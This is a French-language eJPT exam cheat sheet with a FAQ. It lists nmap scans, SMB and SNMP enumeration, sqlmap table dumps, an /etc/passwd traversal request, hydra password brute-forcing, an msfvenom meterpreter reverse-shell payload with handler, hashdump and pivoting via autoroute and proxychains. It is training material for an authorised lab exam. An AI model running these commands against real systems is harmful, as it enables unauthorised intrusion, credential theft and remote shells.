# Découverte d'hôtes & Scanning
L'eJPT commence par trouver les hôtes vivants et les ports ouverts. Maîtrise nmap — c'est l'outil le plus important de l'examen.
nmap -sn 10.10.10.0/24
nmap -p- --min-rate=1000 -T4 TARGET -oN ports.txt
nmap -p OPEN_PORTS -sC -sV TARGET
nmap -sU --top-ports 100 TARGET
# Énumération
Réponds aux questions de l'examen en énumérant chaque service. Utilisateurs, partages, versions et configs : c'est ce que les questions demandent.
smbclient -N -L //TARGET ; enum4linux-ng -A TARGET
snmpwalk -v2c -c public TARGET
ftp TARGET # essaie anonymous / anonymous
gobuster dir -u http://TARGET -w /usr/share/wordlists/dirb/common.txt -x php,txt,html
# Attaques Web
L'eJPT couvre les vulnérabilités web de base : injection SQL, XSS et directory traversal. Burp Suite et sqlmap font le gros du travail.
sqlmap -u "http://TARGET/page.php?id=1" --batch --dbs
sqlmap -u "http://TARGET/page.php?id=1" --batch -D db -T users --dump
curl "http://TARGET/page?file=../../../../etc/passwd"
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
# Exploitation (Metasploit)
Contrairement à l'OSCP, l'eJPT encourage Metasploit. Apprends le workflow msfconsole — c'est ton principal outil d'exploitation.
search, définis RHOSTS/LHOST, puis run.msfconsole -q ; search TYPE:exploit SERVICE
use exploit/MODULE ; set RHOSTS TARGET ; set LHOST YOUR_IP ; run
msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f exe -o shell.exe
use exploit/multi/handler ; set PAYLOAD windows/meterpreter/reverse_tcp ; run
# Post-Exploitation & Pivoting
Une fois une session Meterpreter obtenue, collecte des infos et pivote vers les sous-réseaux internes — un scénario classique de l'eJPT.
getuid ; sysinfo ; hashdump
run autoroute -s 192.168.1.0/24
use auxiliary/server/socks_proxy ; run # puis utilise proxychains
proxychains4 nmap -sT -Pn -p 445,3389 192.168.1.10
# Conseils Examen eJPT
Stratégie pour l'examen accessible et basé sur des questions.
❓ Questions fréquentes eJPT
L'eJPT d'INE est un examen 100% pratique et accessible aux débutants. Tu disposes d'environ 48 heures dans un lab en direct et tu réponds à une série de questions à choix multiples en trouvant des flags et infos sur le réseau cible. Il n'y a aucun rapport écrit.
Non. Contrairement à l'OSCP, la CPTS ou le PNPT, l'eJPT ne demande pas de rapport professionnel. C'est un examen dynamique basé sur des questions : tu exploites le lab et réponds à des questions à choix multiples. L'une des certifications pratiques les plus accessibles aux débutants.
Oui — l'eJPT est largement considéré comme la meilleure certification pentest pratique d'entrée de gamme. Il suppose peu d'expérience et s'accompagne du cours Penetration Testing Student (PTS) d'INE. Il couvre les fondamentaux : scanning, énumération, attaques web, Metasploit et pivoting de base.
Oui — Metasploit est totalement autorisé et même encouragé. Contrairement à l'OSCP (qui le limite à une machine), l'eJPT attend que tu utilises Metasploit et Meterpreter pour l'exploitation, le pivoting (autoroute/socks) et la post-exploitation.
La plupart des candidats ont besoin de 1 à 3 mois. Terminer le parcours Penetration Testing Student (PTS) d'INE et s'entraîner sur des boxes débutantes HackTheBox et TryHackMe suffit à la majorité pour réussir.
L'eJPT se concentre sur les fondamentaux réseau et web et inclut du pivoting de base (routage via un hôte compromis pour atteindre un sous-réseau interne). Ce n'est pas un examen très orienté Active Directory comme la CPTS ou le PNPT.
Passe l'eJPT en premier. C'est la certif d'entrée de gamme qui construit les fondamentaux (scanning, énumération, exploitation, pivoting de base) sans rapport ni buffer overflow. L'OSCP est un gros cran au-dessus. eJPT → OSCP/CPTS est un parcours courant.
Oui. INE inclut généralement un retake gratuit avec le voucher, et l'examen est pensé pour être accessible aux débutants. Vérifie la politique actuelle d'INE pour les détails exacts avant de programmer.
nmap pour le scan, gobuster/dirb et Burp Suite pour le web, sqlmap pour l'injection SQL, Metasploit/Meterpreter pour l'exploitation et le pivoting, hydra pour le brute force, et les outils d'énumération de base (enum4linux, smbclient). Les fondamentaux comptent plus que les outils avancés.
Oui — comme accélérateur d'apprentissage. La mindmap gratuite organise 12 020+ commandes couvrant tous les domaines eJPT (scanning, énumération, web, Metasploit, pivoting) avec recherche instantanée, pour que les débutants trouvent vite la bonne commande. Respecte toujours les règles de ton examen.
📚 Ressources liées
- Cheatsheet Nmap — L'outil n°1 de l'eJPT — référence complète de scan
- Cheatsheet Metasploit — msfconsole, Meterpreter et pivoting — outillage clé de l'eJPT
- Cheatsheet OSCP — Ta prochaine étape après l'eJPT — 150+ commandes d'examen
- Cheatsheet Injection SQL — Une attaque web clé de l'eJPT — payloads et sqlmap
- Débuter en Pentesting — Méthodologie débutant et parcours d'apprentissage pour l'eJPT
- Cheatsheet Pentesting complète — 200+ commandes pour web, réseau, Active Directory et privesc
Prépare ton eJPT avec 12 020+ commandes
Cette cheatsheet n'est que la surface. Pentest Mindmap organise 12 020+ commandes en 34 catégories avec recherche instantanée — parfait pour trouver vite la bonne commande pendant ta prépa eJPT.
Commencer gratuitement →